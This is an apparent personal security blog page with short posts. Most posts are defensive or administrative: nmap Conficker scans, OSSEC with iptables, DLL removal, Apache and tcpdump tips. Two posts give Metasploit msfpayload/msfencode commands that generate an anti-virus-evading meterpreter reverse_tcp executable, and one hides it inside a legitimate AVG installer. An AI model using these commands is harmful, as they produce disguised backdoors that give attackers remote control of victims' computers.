moomba's blog

Msfencode to bypass anti-virus

My little research has determined 2 worthy anti-virus solutions to determine or protect you against Metasploit payloads etc. This research has determined that Sophos and Microsoft Security Essentials are the only worthy engines for this type of attack. On some of the uploads to VirusTotal, DrWeb also found the file to be bad.

So here is what I typed in my Ubuntu system.  You have to have Metasploit installed.

windows/meterpreter/reverse_tcp LHOST= LPORT=9090 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -o bad.exe

Spotting Conficker via Nmap

I grabbed this from the insecure website. I wanted to post this on my site just in case they ever decide to remove the content. Here is how you scan for Conficker.

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args safe=1 [targetnetworks]

I am using this in grepable format so I can easily grep out the infected machines.

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args=unsafe=1 -oG 0-7.nets

The unsafe=1 checks to see if ms08-067-netapi is vulnerable to infection.

Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference. and have some great video tutorials.  This is just a quick reference using meterpreter.


windows/meterpreter/reverse_tcp LHOST= LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe


Simple Bash Script for obtaining IP addresses verse computer names

Situation: User gave me computer names but I need the ip addresses for over 300 machines so I can scan them.

Finished result below
var="-c 1"
for i in $(cat domainnames.txt | awk '{print $1}'); do ping=$(ping $i $var | grep data | awk '{print $3}' | sed s/"("/""/ | sed s/")"/""/ |sed s/":"/""/ >> ipsout.txt);done;
Explanation Below

The -c 1 gets you a single ping when running in a linux environment or from cygwin in windows.

Using OSSEC for HIPS solution

OSSEC is a Host-based Intrusion Detection System (HIDS) however when using it with iptables I have been able to make it work like a Host-based Intrusion Prevention System (HIPS). A foreign address can scan my server and the OSSEC software will detect it and place the ip address into the iptables for a period of time. When no more scan activity is present the iptables will drop the ip address from the table and will allow that foreign host to communicate to the server. I like this method however you have to be careful not to promote your own denial of service with this.

How to remove a dll like ddnsfilter.dll

First its handy to have pstools installed but not necessary.

Bring up a command shell -> Start -> Run -> cmd

type> tasklist /m ddnsfilter.dll

C:\WINDOWS\system32>tasklist /m ddns*

Image Name PID Modules
========================= ====== =============================================
svchost.exe 1548 ddnsfilter.dll

Second find the path of the file through windows explorer so you can highlight and delete after killing the 1548 process id or PID
Now if you have pstools

>pskill 1548
>taskkill /PID 1548 /F

How to spot bad dll files in the Windows/system32 file structure

First make sure you can view all files by going to Tools and Folder Options, View and Select Show hidden files and folders.

Apache VirtualHost tip

I found this the hard way but when you create your virtual host and you want to point actually to the ip address of your network for security purposes us a name because when you go to upgrade to another box you can copy your config and then just change the host name in /etc/hosts

http.conf file
VirtualHost webserver:80

/etc/hosts webserver

Using awk with tcpdump

Say you want to monitor traffic but you want to eliminate your chatty connection traffic so you want to exclude say ssh and/or tcp-3389.

tcpdump -i {interface} -s {packet size} host {host} | awk '!/port1/&&!/port2/'

  #tcpdump -i eth0 -s0 host |awk '!/22/&&!/3389/' 

Also try this - Notice the difference in the awk piece.


A list of spam networks to block in Drupal if your website is US based only.

If your website users are only US based then you can use this list to assist in blocking users using the Xrummer software to create dummy user accounts on your system.
How to block malicious / spam networks with Drupal